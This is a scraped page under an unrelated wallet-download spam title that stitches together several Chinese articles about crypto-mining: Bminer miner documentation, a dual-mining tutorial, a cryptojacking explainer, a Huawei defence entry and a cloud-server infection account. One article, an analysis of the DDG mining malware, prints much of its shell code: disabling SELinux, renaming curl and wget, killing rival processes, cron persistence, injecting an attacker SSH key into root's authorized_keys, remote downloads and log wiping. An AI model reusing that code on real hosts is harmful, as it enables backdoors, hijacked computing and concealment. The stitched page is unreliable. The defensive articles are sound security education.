imtoken官网网址下载|挖矿脚本

作者: imtoken官网网址下载
2024-03-08 03:52:59

Bminer: 最快的挖矿程序

Bminer: 最快的挖矿程序

跳转至

Bminer

简介

键入以开始搜索

Bminer

简介

简介

目录

产品优势

开始挖矿

下载

性能

使用样例

常见问题

参考

群号:231258565

Bminer: When Crypto-mining Made Fast¶

Bminer是一款为NVIDIA和AMD GPU深度优化的挖矿软件。Bminer是目前最快的挖矿程序 -- 我们使用了多种技术以释放出硬件的潜力。Bminer支持包括Equihash, Ethash, Cuckoo-Style等各种算法,能挖ETH(以太坊),ZEC(零币),GRIN等币种。

Bminer不仅提供数据界面监测矿机温度,运行结果等数据,还提供应用程序编程接口(API)以便于大规模使用和部署大批量矿机。

Bminer支持Zhash/Equihash 144,5 算法的币种(比如,比特币黄金BitcoinGold,次世代比特币BitcoinZ),仅抽取2%作为开发者支持费用

Bminer挖Ethash币种(比如:以太坊ETH/以太经典ETC),仅抽取0.65%作为开发者支持费用。

Bminer支持双挖模式,同时挖Ethash币种(比如:以太坊ETH)和Blake14r的币种(比如:DCR)或,同时挖Ethash币种(比如:以太坊ETH)和Blake2s的币种(比如:Verge),仅抽取Ethash币种1.3%的算力作为开发者支持费用,同时挖的另一种币种将不被抽取任何算力。

Bminer支持Bytom比原币(BTM),仅抽取2%作为开发者支持费用。

Bminer支持Grin(GRIN),仅抽取1%作为开发者支持费用。

产品优势¶

高效快速

Bminer是市场上最快的挖矿程序之一

安全稳定

SSL 支持

网络传输失败时可以自动恢复

在GPU挂起时可自动重启

操作简单

提供了应用程序编程接口(API)进行大规模生产部署

开始挖矿¶

下载 Bminer并解压到文件夹 (例如 C:\bminer or /home/bminer)

根据您想获得的数字货币,找到对应的脚本。例如用Cuckaroo29算法挖GRIN时对应的脚本为mine_grin29.bat (Windows) 或 mine_grin29.sh (Linux)

把脚本的矿池、帐号替换为您的信息

运行脚本,开始挖矿 :-)

请访问参考和例子页面以了解Bminer更多高级用法,

实力解剖一枚挖矿脚本,风骚操作亮瞎双眼 - 知乎

实力解剖一枚挖矿脚本,风骚操作亮瞎双眼 - 知乎首发于Linux《荒岛余生》切换模式写文章登录/注册实力解剖一枚挖矿脚本,风骚操作亮瞎双眼小姐姐味道原创:小姐姐味道(微信公众号ID:xjjdog),欢迎分享,转载请保留出处。公司有几台机器,最近cpu一直在疯转,就像是吃了春药,一直在发热。由于机器实在是太多,有这么几台安全性防护没有到位,就一直躺在角落里疯狂运转。直到统一的监控脚本接管了这几台机器,异常情况才得以浮出水面。最后发现了多个奇奇怪怪的进程,发现是一个挖矿脚本。下载下来学习了一下,发现脚本的编写者,有着较高的水平。虽然在别人机器进行挖矿行为是不道德的,但掩盖不了脚本编写者的风骚操作。挖矿,是计算机技术界最让人迷惑的行为之一,但它赚钱。据悉,这段脚本名叫DDG,已经挖取了价值一千多万人民币的虚拟币货币。本着学习的目的,我稍微分析了一下这个神奇的脚本,也算是吸尽它的精华,为我所用。这事我都没敢告诉老板,因为说了他也不懂,反生事端。不过和大家交流一下还是可以的,因为你们懂啊。code 1#!/bin/sh脚本的第一行,看起来是一行注释,但其实并不是。它规定了接下来的脚本,将要采用哪一个SHELL执行。像我们平常用的bash、zsh等,属于sh的超集,这个脚本使用sh作为执行的shell,具有更好的可移植性。code 2setenforce 0 2>dev/null

echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/nullsetenforce是Linux的selinux防火墙配置命令,执行setenforce 0 表示关闭selinux防火墙。2代表的是标准错误(stderr)的意思。所以后面,使用重定向符,将命令的错误输出定向到/dev/null设备中。这个设备是一个虚拟设备,意思是什么都不干。非常适合静悄悄的干坏事。code 3sync && echo 3 >/proc/sys/vm/drop_caches脚本贴心的帮我们释放了一些内存资源,以便获取更多的资源进行挖矿。众所周知,Linux系统会随着长时间的运行,会产生很多缓存,清理方式就是写一个数字到drop_caches文件里,这个数字通常为3。sync命令将所有未写的系统缓冲区写到磁盘中,执行之后就可以放心的释放缓存了。code 4crondir='/var/spool/cron/'"$USER"

cont=`cat ${crondir}`

ssht=`cat /root/.ssh/authorized_keys`

echo 1 > /etc/sysupdates

rtdir="/etc/sysupdates"

bbdir="/usr/bin/curl"

bbdira="/usr/bin/cur"

ccdir="/usr/bin/wget"

ccdira="/usr/bin/wge"

mv /usr/bin/wget /usr/bin/get

mv /usr/bin/xget /usr/bin/get

mv /usr/bin/get /usr/bin/wge

mv /usr/bin/curl /usr/bin/url

mv /usr/bin/xurl /usr/bin/url

mv /usr/bin/url /usr/bin/cur没错,上面这些语句就是完成了一些普通的操作。值得注意的是,它把我们的一些常用命令,使用mv命令给重名了。这在执行命令的时候,就会显得分成功能的蛋疼。这脚本已经更改了计算机的一些文件,属于犯罪的范畴了。脚本为了复用一些功能,抽象出了很多的函数。我们直接跳到main函数的执行,然后看一下这个过程。code 5首先是kill_miner_proc函数。代码很长,就不全部贴出来了。kill_miner_proc()

{

ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9

...

pkill -f biosetjenkins

pkill -f Loopback

...

crontab -r

rm -rf /var/spool/cron/*挖矿领域是一个相爱相杀的领域。这个方法首先使用ps、grep、kill一套组合,干掉了同行的挖矿脚本,然后停掉了同行的cron脚本,黑吃黑的感觉。在这段脚本里,使用了pkill命令。这个命令会终止进程,并按终端号踢出用户,比较暴力。code 6接下来执行的是kill_sus_proc函数。ps axf -o "pid"|while read procid

do

...

doneps加上o参数,可以指定要输出的列,在这里只输出的进程的pid,然后使用read函数,对procid进行遍历操作。code 7ls -l /proc/$procid/exe | grep /tmp

if [ $? -ne 1 ]

then

...

fi上面就是遍历操作过程了,我们可以看到if语句的语法。其中$?指的是上一个命令的退出状态。0表示没有错误,其他任何值表明有错误。-ne是不等于的意思,意思就是能够匹配到tmp这个字符串。code 8ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid

do

...

done呵呵,上面又来了一次循环遍历。不过这次针对的目标,是cpu使用超过40%的进程。读过xjjdog对awk分析的同学,对这个命令应该非常的熟悉。这就有点狠了:影响我挖矿的进程,都得死!相煎何太急。code 9再接下来,脚本针对不同的用户属性,进行了不同的操作。首先是root用户。通过判断是否存在$rtdir文件,来确定是否是root权限。chattr -i /etc/sysupdate*

chattr -i /etc/config.json*

chattr -i /etc/update.sh*

chattr -i /root/.ssh/authorized_keys*

chattr -i /etc/networkservice使用chattr命令,把一些重要的文件,搞成不能任意改动的只读属性,也是够损的。然后,操作cron程序,把脚本的更新服务加入到定时中。就是下面这段脚本。code 10if [ ! -f "/usr/bin/crontab" ]

then

echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" >> ${crondir}

else

[[ $cont =~ "update.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -

fi注意[[ $cont =~ "update.sh" ]]这以小段代码,怪异的很。[[ ]]是shell中内置的一个命令,支持字符串的模式匹配。使用=~的时候,甚至支持shell的正则表达式,强大的令人发指。它的输出结果是一个bool类型,所以能够使用||进行拼接。而后面的单小括号 (),是的是一个命令组,括号中多个命令之间用分号隔开,最后一个命令可以没有分号;和`cmd`的效果基本是一样的。code 11搞完了定时任务,就要配置ssh自动登录了,通过把公钥追加到信任列表中就可以。chmod 700 /root/.ssh/

echo >> /root/.ssh/authorized_keys

chmod 600 root/.ssh/authorized_keys

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/ oeXUWDNW1MrWiQNvKeSeSSdZ6NaYVqfSJgXUSgiQbktTo8Fhv43R9FWDvVhSrwPoFBz9SAfgO06jc0M2kGVNS9J2sLJdUB9u1KxY5IOzqG4QTgZ6LP2UUWLG7TGMpkbK7z6G8HAZx7u3l5+Vc82dKtI0zb/ohYSBb7pK/2QFeVa22L+ 4IDrEXmlv3mOvyH5DwCh3HcHjtDPrAhFqGVyFZBsRZbQVlrPfsxXH2bOLc1PMrK1oG8dyk8gY8m4iZfr9ZDGxs4gAqdWtBQNIN8cvz4SI+Jv9fvayMH7f+ Kl2yXiHN5oD9BVTkdIWX root@u17" >> /root/.ssh/authorized_keyscode 12说曹操曹操就到,下面的脚本就使用了``进行操作。filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`

if [ "$filesize_config" -ne "$config_size" ]

then

pkill -f sysupdate

rm /etc/config.json

downloads $config_url /etc/config.json $config_url_backup

else

echo "no need download"

fi通过一系列骚操作,获取到配置文件的大小,如果判断文件大小不一致,那么就重新下载一个。这就用到了downloads函数。shell中的函数,看起来比较怪异,后面的参数传递,就像是脚本传递一样,传送给函数。code 13downloads $config_url /etc/config.json $config_url_backup这句话,就传递了三个参数。当然,文件要从遥远的服务器上下载。域名是.de结尾的,证明是个德国的域名,其他的我们一无所知。downloads()

{

if [ -f "/usr/bin/curl" ]

then

echo $1,$2

http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`

if [ "$http_code" -eq "200" ]

then

curl --connect-timeout 10 --retry 100 $1 > $2

elif [ "$http_code" -eq "405" ]

then

curl --connect-timeout 10 --retry 100 $1 > $2

else

curl --connect-timeout 10 --retry 100 $3 > $2

fi

elif [ -f "/usr/bin/cur" ]

then

http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`

if [ "$http_code" -eq "200" ]

then

cur --connect-timeout 10 --retry 100 $1 > $2

elif [ "$http_code" -eq "405" ]

then

cur --connect-timeout 10 --retry 100 $1 > $2

else

cur --connect-timeout 10 --retry 100 $3 > $2

fi

elif [ -f "/usr/bin/wget" ]

then

wget --timeout=10 --tries=100 -O $2 $1

if [ $? -ne 0 ]

then

wget --timeout=10 --tries=100 -O $2 $3

fi

elif [ -f "/usr/bin/wge" ]

then

wge --timeout=10 --tries=100 -O $2 $1

if [ $? -eq 0 ]

then

wge --timeout=10 --tries=100 -O $2 $3

fi

fi

}我认为,这段代码作者写的又臭又长,完全没有体现出自己应有的水平。应该是赶工期,没有想好代码的复用,才会写的这么有失水准。我们上面说到,脚本改了几个命令的名字,其中就有curl。这个命令是如此的强大,以至于脚本的作者都忍不住加了不少参数。-I 是用来测试http头信息-m 设置最大传输时间-o 指定保持的文件名。这里是/dev/null,呃呃呃-s 静默模式。不输出任何东西—connect-timeout 连接超时时间—retry 重试次数,好狠100次如果没有curl?那就使用替补的wget,套路都是一样的。code 14接下来是一系列相似的操作,最后,对iptables一批操作。iptables -F

iptables -X

iptables -A OUTPUT -p tcp --dport 3333 -j DROP

iptables -A OUTPUT -p tcp --dport 5555 -j DROP

iptables -A OUTPUT -p tcp --dport 7777 -j DROP

iptables -A OUTPUT -p tcp --dport 9999 -j DROP

iptables -I INPUT -s 43.245.222.57 -j DROP

service iptables reloadcode 15细心的脚本编写者,还使用命令清理了操作日志。history -c

echo > /var/spool/mail/root

echo > /var/log/wtmp

echo > /var/log/secure

echo > /root/.bash_history不露死角,潇洒走开。可以看到,且不说真正的挖矿程序,仅仅是这个小脚本,作者也下足了功夫。脚本里命令繁多,使用方式多样,缩紧格式优雅,除了有一点啰嗦,没有加密之外,是一个非常好的拿来学习的脚本。瞧了瞧被控制的机器,我赶紧偷偷的重装了机器。就当它是一个梦吧。老板问起的时候,什么都没有发生过。有需要拿到完整脚本的同学。关注xjjdog微信公众号,回复wkjb,即可获取。作者简介:小姐姐味道 (xjjdog),一个不允许程序员走弯路的公众号。聚焦基础架构和Linux。十年架构,日百亿流量,与你探讨高并发世界,给你不一样的味道。我的个人微信xjjdog0,欢迎添加好友,​进一步交流。​发布于 2020-06-03 09:06shell 脚本Linux木马​赞同 20​​4 条评论​分享​喜欢​收藏​申请转载​文章被以下专栏收录Linux《荒岛余生》没有什么比一张图来了解Linux更好

Bminer 双挖ETH和BTM教程 - 知乎

Bminer 双挖ETH和BTM教程 - 知乎切换模式写文章登录/注册Bminer 双挖ETH和BTM教程Bminer挖矿程序Bminer是基于NVIDIA GPU最快的挖矿程序。Bminer从11.0.0版本开发支持Ethash (ETH) 和Tensority (BTM) 的双挖。步骤1:访问Bminer官网下载11.0.0版本。如图所示,红框部分的包。步骤2:找到您下载的Bminer文件,并解压。步骤3:编辑mine_eth_btm.bat文件;步骤4: 根据图示修改钱包地址,矿工名等信息。@echo OFFREM Change the following address to your ETH addr.SET ADDRESS=您的个人ETH钱包REM Change the following address to yourBTM addr.SET ADDRESS_2=您的个人BTM钱包SET USERNAME=%ADDRESS%.ETH矿工名REM Change SCHEME according to your POOL. For example:REM ethash: Ethermine, NanopoolREM ethproxy: F2pool, SparkpoolREM ethstratum: MiningpoolhubSET POOL=ETH矿池和端口。推荐如下ETH矿池,排名不分先后。熊猫矿池:http://eth.pandaminer.com:8008蜜蜂矿池:http://eth-pool.beepool.org:9530小鸟矿池:http://eth1.xnpool.cn:8008火池:http://eth.firepool.com:8008蜘蛛矿池:eth.pool.zhizhu.top:3867星火矿池:http://cn.sparkpool.com:3333鱼池:http://eth.f2pool.com:8008SET SCHEME=ETH矿池对应的协议,国内常用ethproxy。SET USERNAME_2=%ADDRESS_2%.BTM矿工名SET POOL_2=BTM矿池和端口。推荐如下BTM矿池,排名不分先后。蜜蜂矿池:http://btm-pool.beepool.org:9502巴比特官方矿池:http://btm.matpool.io:8118蜘蛛矿池:btm.pool.zhizhu.top:3859鱼池:http://btm.f2pool.com:9221SET SCHEME_2=tensoritySTART "Bminer: When Crypto-mining Made Fast" bminer.exe -uri %SCHEME%://%USERNAME%@%POOL% -uri2 %SCHEME_2%://%USERNAME_2%@%POOL_2% -api 127.0.0.1:1880步骤5: 保存后开始运行挖矿,展示如下表示运行正常。1080ti 2张的运行结果步骤6:查看矿池算力。由下图矿池和本地算力对比可知,算力差在5%以内。ETH 矿池算力BTM 矿池算力产品简介—Bminer是一款基于NVIDIA显卡的挖矿内核。安全,稳定,最低开发者费用,不断突破性能极限。目前已支持以太坊单挖,以太坊双挖ETH/BTM,ETH/DCR,ETH/XVG,ETC,equihash(Zcash,ZenCash),equihash 144,5(BTG,SnowGem,BTCZ等硬分叉后抗ASIC币),比原币。官方联系方式—官方QQ群:231258565中文官网:http://www.bminer.me/zh/Bminer官方教程:https://blog.csdn.net/BminerTwitter:https://twitter.com/realbminerBitcointalk:https://bitcointalk.org/index.php?topic=2519271.0扫码或者阅读原文免费下载Bminer:https://www.bminer.me/zh/releases/ (二维码自动识别)发布于 2018-12-25 22:13区块链(Blockchain)挖矿​赞同 9​​1 条评论​分享​喜欢​收藏​申请

不要让你的电脑为别人挖矿 - 知乎

不要让你的电脑为别人挖矿 - 知乎首发于某物理系学生随笔切换模式写文章登录/注册不要让你的电脑为别人挖矿ostloI'm Ostlo. That's enough.最近,每次打开chrome,浏览一些“正经”的网站后,cpu使用量就爆增,可怜的电脑还没用多久电量就告急,逼着我到处找充电板,忍无可忍的我决定解决这件事,详细看了下活动监视器里的进程,发现一个chrome进程占用量很大,但网上找不到任何关于它的说明,但一则新闻进入我的眼中。海盗湾被发现在利用访问者电脑的浏览器进行虚拟币挖矿!海盗湾使用了Coinhive提供的功能,利用网页中嵌入的一段JavaScript脚本就可让访问该网站的电脑使用CPU资源为它进行虚拟币挖矿。从Coinhive官网的信息来看,它宣传此举可在为网站主带来收益的同时,减少对网页广告的倚赖。不过最大的问题在于,用户并不知晓自己电脑会在未经允许的情况下被用来挖矿。Coinhive选择了Monero(门罗币),这种虚拟币使用显卡挖矿的收益提升幅度不高,对于使用访客电脑的CPU挖矿较为有利,之前已经有不少流氓软件通过将用户电脑变成门罗币挖矿肉鸡来盈利。小编在自己i5处理器的笔记本电脑上尝试开启浏览器挖矿测试,CPU直接达到了满载,散热风扇呼呼的转了起来。海盗湾等网站在利用访客电脑挖矿时会对性能略作一些限制,减少用户知觉。但不告而取谓之窃,未经用户知情和允许而利用电脑CPU资源挖矿盈利,不管怎么说都是见不得光的事情。禁用JavaScript脚本可以阻止海盗湾窃取CPU算力,不过也会影响一些正常的网页功能使用。更广泛的影响是,你不会知道除了海盗湾之外,还会有多少网站群起效仿。海盗湾用访客电脑CPU挖矿事件的曝光其实是揭开了一个网站灰色创收方式。那些大量占用CPU资源的网页游戏有没有在做同样的事?各种流氓软件除了后台运行和弹窗广告之外,会不会纷纷效仿?或许为了避免被发现他们会比较收敛,主动对资源占用进行一些限制,但如果多个软件都盯上你的电脑,就算是英特尔酷睿i9和AMD Threadripper这样的处理器也会被累趴下。一旦开始「挖矿」将会消耗系统大量的资源,目前的挖矿脚本只在chrome上运行,不排除以后其它浏览器受到影响的可能性。在chrome里,MinerBlock这款扩展就可以帮你阻止一些网站利用浏览器进行「挖矿」。(免费)MinerBlock 的用法也很简单,安装后直接可以用,没什么正式的设置界面,当你查看的网站有「挖矿」行为的话,它会进行阻止并且进行提示。其实网站利用浏览器「挖矿」的原理是通过一小段的 JS 代码,而阻止「挖矿」的方式就很显而易见了,阻止这段 JS 代码执行即可,而 MinerBlock 也是利用了这样的原理。其实一旦你明白了这个原理之后,也可以通过其他一些浏览器扩展像广告拦截扩展、JS 拦截扩展等进行屏蔽,只不过需要自己手动去发现和操作。MinerBlock 目前也在 GitHub 上开源,当然也是为了防止监守自盗的情形。下载地址:Chrome 应用店丨GitHub(不定期更新,建议关注)二更chrome上不要留太多插件了,现已知情况是一些垃圾插件也会偷偷挖矿,具体情况可以看自己CPU使用情况,卸载了垃圾插件后chrome的cpu使用量恢复正常三更目前主流杀毒软件部分网站会提示警告消息,但有些网站没有提醒,建议安装block插件,同时,最根本的办法就是时不时看看自己的进程占CPU情况(活动监视器)四更chrome的cpu使用情况查询点击右上角的三个点,选择更多工具中的任务管理器效果如下编辑于 2018-01-25 13:07网络安全挖矿脚本​赞同 7489​​685 条评论​分享​喜欢​收藏​申请转载​文章被以下专栏收录某物理系学

什么是挖矿?如何防止挖矿劫持? - 华为

什么是挖矿?如何防止挖矿劫持? - 华为

本站点使用Cookies,继续浏览表示您同意我们使用Cookies。

Cookies和隐私政策>

技术支持

运营商入口

公告

中文

English

首页

信息速查

IP知识百科

在线课堂

产品智能选型

首页

信息速查

产品智能选型

IP知识百科

中文

English

登录

提示

确定

取消

IP知识百科

IP知识百科

>

挖矿

什么是挖矿

挖矿(Mining),又称加密货币挖矿(Cryptocurrency Mining),是指使用计算机算力竞相求解加密方程,以获得加密货币的过程。由于求解验证的过程需要耗费大量的计算资源和电力,为了以更低的成本牟取私利,攻击者会向个人或企业的计算机和移动设备植入挖矿程序,劫持设备计算资源进行挖矿。这种恶意行为被称为“挖矿劫持”(Cryptojacking)。恶意挖矿程序潜伏在设备后台运行,很难被检测到,这会导致设备响应变慢、CPU使用率上升、温度过高和电费增加等问题。

目录

挖矿的过程和相关概念

挖矿劫持的手段

如何判断设备是否遭受了挖矿劫持

如何防止挖矿劫持

华为如何应对挖矿劫持

更多

收起

挖矿的过程和相关概念

挖矿的过程涉及区块链的创建,其中相关的概念如下:

区块链(Blockchain):区块链是一系列按时间顺序排列的区块,链上的数字交易都带有时间戳,这样交易就不会被重复记录。

区块(Blocks):每个区块会存储交易的详细数据,包括交易的付款人和收款人、金额和加密哈希。

哈希(Hashes):哈希函数是将数据转换为固定长度的字符串的数学方程。区块哈希用于校验加密货币交易信息是否被篡改。

矿工(Miners)。矿工是区块链中的特殊节点,负责计算哈希值来验证区块链中的区块。第一个向其他节点广播完成哈希值计算的矿工,将获得加密货币奖励。

交易(Transactions)。交易是指用户双方之间的加密货币交易。每笔单独的交易都会与其他交易一同组成一个列表,该列表会被添加到未被验证的区块中,等待矿工节点进行验证。

共识算法(Consensus algorithm)。共识算法是区块链中的一种协议,区块链中的每个节点通过共识算法验证数据。

在挖矿的过程中,矿工需要使用高性能计算机求解加密哈希方程,验证加密货币交易信息,并将交易信息记录在区块链上以获得加密货币。下面举例说明挖矿的过程。

A用加密货币从B那购买一本书,产生了一笔新的交易。

矿工节点对这笔交易的合法性进行验证,并将合法的交易和近期的交易打包到一个区块中。

矿工节点使用共识算法竞相求解加密哈希方程,验证这个新的区块。

第一个完成新区块验证的矿工节点将新区块添加到区块链上,向其他节点广播完成区块挖掘,获得加密货币奖励。

A和B的交易信息记录在区块链上,交易完成。

挖矿的过程

随着加密货币系统的发展,加密方程的求解难度也呈指数级上升,个人计算机设备的算力不足以支撑矿工进行挖矿。于是,矿工会加入矿池,与其他矿工一起协作挖矿。矿工可以根据工作量获得相应的加密货币收益。矿工设备一般通过Stratum协议与矿池进行通信。

挖矿劫持的手段

由于挖矿的成本变得越来越高,为了以更低成本赚取更多加密货币,攻击者会在未经许可的情况下,劫持个人或企业设备资源进挖矿,这种恶意行为被称为“挖矿劫持”。攻击者进行挖矿劫持的手段主要包括以下三种:

通过恶意程序挖矿

攻击者通常会利用社会工程学的攻击手段,诱导用户点击下载恶意挖矿程序。挖矿程序一旦下载到用户设备中,便会自动在后台运行,劫持设备计算资源进行挖矿。

攻击者最常使用的手段是钓鱼邮件。当用户打开钓鱼邮件附件或点击邮件中的恶意链接时,恶意挖矿程序会自动下载到用户的设备中,并可能通过横向渗透的方式感染网络中其他设备,部署挖矿程序,挖掘加密货币。

还有一种手段是软件捆绑下载。攻击者将挖矿程序植入软件包,用户从非法渠道下载并安装破解软件、激活工具、游戏外挂或盗版游戏时,挖矿程序也会同步安装到计算机上,并自动在后台运行。

通过浏览器挖矿

攻击者将挖矿脚本嵌入到网页JavaScript或网页广告中,通过浏览器劫持用户设备进行挖矿。当用户浏览网页或者广告时,挖矿脚本会自动运行,占用用户设备计算资源进行挖矿。攻击者一般会在浏览量高的网页上内嵌脚本,以便扩大挖矿脚本的传播范围。

另一种手段是通过浏览器插件进行挖矿。攻击者将挖矿脚本嵌入到浏览器插件中,伪装成正常的浏览器插件并上传至插件商店。用户下载安装后,攻击者便能利用浏览器进行挖矿。

通过云服务挖矿

攻击者会窃取云服务的API密钥,获取管理权限,然后写入挖矿脚本,安装挖矿程序到云服务环境中,劫持云服务的计算资源进行挖矿。

攻击者还会利用漏洞对大量云主机发起攻击,占用失陷云主机的计算资源进行挖矿。

如何判断设备是否遭受了挖矿劫持

挖矿程序一般会伪装成正常的程序,潜伏在设备后台运行,难以被察觉,您可以通过以下方式来识别设备是否遭受了挖矿劫持。

检查设备性能是否下降。性能下降是设备受到了挖矿劫持最显著的迹象,挖矿程序的运行会导致系统变慢甚至崩溃。

检测设备是否过热。挖矿程序会占用设备大量计算资源,导致设备过热,损害设备硬件,缩短设备使用寿命。

分析CPU占用率是否升高。挖矿程序会导致CPU占用率长时间居高不下,可以使用活动监视器或任务管理器来监控和分析CPU的使用情况。

统计电费是否增加。挖矿程序长时间潜伏在后台运行,会导致电力消耗增加,电费开支增多。

如何防止挖矿劫持

设备遭受挖矿劫持的迹象并不如受到其他威胁攻击那样明显,您可以采取一些防御措施来保护设备和网络免受侵害。

对IT团队进行培训,让团队成员了解设备遭受挖矿劫持的迹象,及时进行检测并采取措施清除挖矿程序。

对员工进行全面的网络安全教育,警惕钓鱼邮件和恶意链接,禁止随意安装未知来源的第三方软件。

在浏览器中安装反挖矿插件,阻止攻击者利用浏览器进行挖矿。

安装广告拦截软件,检测和拦截嵌有挖矿脚本的网页广告。

浏览网页时,禁用浏览器JavaScript,防止挖矿脚本感染设备。

采用专门的安全设备来检测和防御挖矿程序。

华为如何应对挖矿劫持

面对层出不穷的挖矿劫持事件,华为提供了可靠的安全解决方案和安全产品,能对设备和网络进行检测,及时发现并处置挖矿威胁,保护您的设备和网络免受侵害。

HiSec Insight安全态势感知系统HiSec Insight通过对流量和告警等信息进行收集和关联分析,能检测出网络中的挖矿威胁事件,提供挖矿威胁事件的详情、处置建议和威胁分析取证信息,方便安全运维人员及时查看和处理网络中的挖矿威胁事件。

华为乾坤安全云服务解决方案华为乾坤安全云服务具备终端防护与响应服务能力,可以对全磁盘目录进行实时防护,避免挖矿软件以浏览器下载、U盘转移等方式入侵。华为乾坤安全云服务还能通过Agent上报的DNS请求数据,与威胁信息矿池库做对比,检测是否存在向挖矿矿池请求的恶意连接,及时发现威胁事件。此外,华为乾坤安全云服务还能对挖矿病毒软件进行查杀,检出挖矿病毒软件并将其隔离。

HiSecEngine USG6000F系列AI防火墙USG6000F系列AI防火墙的反病毒功能可对网络中传输的挖矿病毒进行检测,发现携带挖矿病毒的软件后进行阻断或告警,使企业内部免受侵害。此外,防火墙配置的入侵防御特征库可检测挖矿软件连接矿池的流量,及时对挖矿流量进行阻断。

参考资源

1了解HiSec Insight安全态势感知系统

2了解华为乾坤安全云服务解决方案

3了解HiSecEngine USG6000F系列AI防火墙

Your browser does not support the video tag.

相关词条

AI防火墙

反病毒

社会工程

网络安全态势感知

词条统计

作者:

曾月清

最近更新:

2022-11-22

浏览次数:

7679

平均得分:

页内导航

挖矿的过程和相关概念

挖矿劫持的手段

如何判断设备是否遭受了挖矿劫持

如何防止挖矿劫持

华为如何应对挖矿劫持

问卷调研

帮助中心

在线客服

分享链接

意见反馈

分享链接到:

意见反馈

关注我们

关于华为

华为公司简介

关于企业业务

查找中国办事处

新闻中心

市场活动

信任中心

如何购买

售前在线咨询

提交项目需求

查找经销商

向经销商询价

合作伙伴

成为合作伙伴

合作伙伴培训

合作伙伴政策

资源

华为“懂行”体验店

e直播

博客

资料中心

视频中心

电子期刊

成功案例

快速链接

互动社区

华为云

华为智能光伏

华为商城

华为招聘

版权所有 © 华为技术有限公司 1998-2023。 保留一切权利。粤A2-20044005号

隐私保护

|

法律声明

|

网站地图

|

云服务器挖矿新姿势?挖矿也知道不能竭泽而渔了。 - 掘金

云服务器挖矿新姿势?挖矿也知道不能竭泽而渔了。 - 掘金

首页 首页

沸点

课程

直播

活动

竞赛

商城

APP

插件 搜索历史

清空

创作者中心

写文章 发沸点 写笔记 写代码 草稿箱 创作灵感

查看更多

会员

登录

注册

云服务器挖矿新姿势?挖矿也知道不能竭泽而渔了。

DaveCui

2023-02-01

175

开启掘金成长之旅!这是我参与「掘金日新计划 · 2 月更文挑战」的第 1 天,点击查看活动详情

这篇文章主要记录一下我的云服务器被挖矿的经历,包括全部的探索过程和处理流程。在我遥远的记忆里,以往看到别人被攻击都是云服务器cpu使用率直接拉到百分百的,这个挖矿程序只给我拉到百分之五十,让我一度以为这不是挖矿程序,看来挖矿脚本也越来越狡猾了,知道不能竭泽而渔干一票就跑了。

问题初现

双十一打折的时候,我买了个华为云的云服务器。之前在上面部署过任务,但是最近已经把任务都停掉了。不过我最近想着再部署个任务上去,结果发现出了大问题了。

谁家好服务器能在空闲时cpu使用率干到50%?

摸索问题

初次定论:被攻击了

于是我赶紧打开xshell,准备看看这个货到底在干啥。首先是我最熟悉的top

可以看到使用率在49.5%接近50%,然后tasks那里显示只有一个任务在执行。

就是下面的列表所有的进程占用率加起来都没1%。啥情况嘞?

然后我看到这么一篇文章。

有一说一,有点吓人。

接下来继续排查原因呗。

试了下ps H -eo user,pid,ppid,tid,time,%cpu,cmd --sort=%cpu这个命令,也没有那个占用率很高的进程

查了下top和ps命令的更改时间。时间也是能对应上的,毕竟在2016年,最近没有更改。所以可能,大概率不是命令被篡改的问题。

显然本人也是个linux的菜鸡实在不知道怎么解决这个问题。所以就继续搜呗,还能怎么办?一百多块钱不要了啊。

在我继续面向度娘改bug的时候,我看到这么一篇文章。里面的精华部分是这样的。虽然我没用过pstree和execsnoop但是我关注的重点是应用不停的再重启。

巧了,我一下子就想到之前我把chatgpt对接到微信用的就是这里的数据库。chatgpt对接微信全流程 - 掘金 (juejin.cn)

这个东西在1.7就已经不运行了,日志也就截止在这里。很可能,就是这个程序在一直重启,一直在占用cpu资源。

可能没被攻击:先处理go程序

但是,我得坦白一件事。我不会go语言的程序中断。我刚查了才知道java有个jps而,go有个gops。

但是吧,我甚至连gops安装go get -u github.com/google/gops报错都不知道怎么处理。初次来看是版本问题。

那我就直接下载这个1.17版本的呗,之前我的下载语句是

wget https://golang.google.cn/dl/go1.16.7.linux-amd64.tar.gz

现在直接改成

wget https://golang.google.cn/dl/go1.17.0.linux-amd64.tar.gz

他还给我报错,wget命令没找到?

不知道啥情况,感觉现在这个机器一团乱麻。明明查得到,结果用不了。

那能怎么办?一百多块钱呢,总不能不要了吧。

先卸载

yum remove wget

再安装

yum -y install wget

总感觉今天诸事不顺呢。

wget没问题了,现在是没有1.17.0这个版本。只能去官网找找看了。以下的版本都可以。我直接把上面的下载语句的.0删掉。

下载后解压(记得在这之前先把app目录下的go删掉rm -rf go)

tar -xvzf go1.17.linux-amd64.tar.gz -C /root/app

查看go version,环境换了昂。

运行上面的下载gops的语句go get -u github.com/google/gops

尝试干掉go:白忙活

干掉这两个进程之后,很遗憾,cpu使用率还是照旧。说明不是这个问题。

我突然想起来,我的服务器上还有两个东西,mysql和redis。虽然目前没有应用去用到他们。不过干掉试试看,万一呢?

尝试干掉redis:白忙活

pkill redis

尝试干掉mysql:白忙活

阶段性总结:应该就是被攻击了

他奶奶滴,看来mysql,redis不用的时候不占cpu使用率。大家不用踩坑了。目前的cpu使用率还是这个样子。而我的服务器好像没有可以停止的程序了。

我觉得我的思路走岔了,我应该直接找那唯一一个running的task。

查了下,top和ps是死活查不出来。为此我新安装了个命令htop

yum install htop

直接执行htop,终于看到这个占cpu使用率50%的进程。

一个运行了15小时,一个运行了72小时。看来时间还不长。

我看到了程序的command描述,好家伙一个zzh一个hash。完美符合挖矿程序的特征。主要还是看到了这个老哥的博客。

记录一次服务器被入侵(恶意挖矿)的问题_键盘歌唱家的博客

把那几个多出来的进程,kil掉就行了。cpu使用率回归正常。

探查原因

虽然这个问题表面上解决了,但是不法组织肯定有手段进来一次,肯定有手段进来第二次。所以我得看看我的服务器账户有什么问题没有。

用户登录记录

从用户登录来看,只有我自己登录了。但是黑客嘛,肯定有点手段的,不可能在登录记录留下来。

